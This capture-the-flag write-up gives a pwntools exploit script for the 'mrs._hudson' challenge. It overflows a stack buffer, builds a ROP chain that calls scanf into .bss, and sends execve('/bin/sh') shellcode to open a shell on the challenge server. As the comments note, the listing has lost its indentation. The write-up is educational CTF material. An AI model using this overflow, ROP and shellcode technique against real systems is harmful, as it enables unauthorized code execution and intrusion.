Tags: pwn 

Rating:

```
from pwn import *
#import hexdump

# Target tube context: 64-bit Linux, so p64() packs 8-byte little-endian values.
context(arch='amd64',os='linux')
# Toggle between a local process and the remote CTF service; as committed,
# the remote branch is taken.
#local=True
local=False

# NOTE: the indentation of these branch bodies (and of the __main__ block
# below) was lost in this listing; as shown, the file is not valid Python.
if local:
p = process("./mrs._hudson")
else:
p = remote("178.62.249.106", 8642)

# Loaded but never referenced afterwards in this script.
binary = ELF("./mrs._hudson")

# Python 2 builtin; blocks until Enter is pressed (presumably a pause to
# attach a debugger before sending anything). Indicates the script targets
# Python 2 pwntools, where the str-based payload building below is valid.
raw_input()

# Raw machine-code bytes, sent as the second line of input. The commented-out
# line is an alternative stub the author left disabled.
shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
#shellcode = "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
# Writable address the author labels as .bss; used both as the buffer
# scanf writes into and as the final return target.
bss = 0x601040

# Hard-coded gadget / PLT addresses (names are the author's). Fixed values
# like these presume the binary is mapped at a constant base (no PIE) and
# are only valid for this exact build — assumption, not verified here.
pop_rdi = 0x4006f3
pop_rsi_r15 = 0x4006f1
scanf_plt_6 = 0x400526

# Address passed as the first argument to scanf; presumably a format-string
# literal inside the binary (name "aS" suggests "%s") — confirm against the
# disassembly.
aS = 0x40072b

if __name__ == '__main__':
# 0x70 bytes of filler, then an 8-byte marker (presumably the saved frame
# pointer slot), then the chain of 8-byte values below.
payload = "A"*0x70 + "ebppebpp"
# By the gadget names: rdi <- aS, rsi <- bss (r15 gets the second bss copy),
# then scanf_plt_6 is entered and its return lands at bss.
payload += p64(pop_rdi) + p64(aS)
payload += p64(pop_rsi_r15) + p64(bss) + p64(bss)
payload += p64(scanf_plt_6)
payload += p64(bss)

# Both sends are newline-terminated. On Python 3 pwntools, p64() returns
# bytes and these str concatenations would raise TypeError.
p.send(payload + '\n')
p.send(shellcode + '\n')

# Hand the tube over to the terminal.
p.interactive()

```

Original writeup (http://holinder4s.tistory.com/79).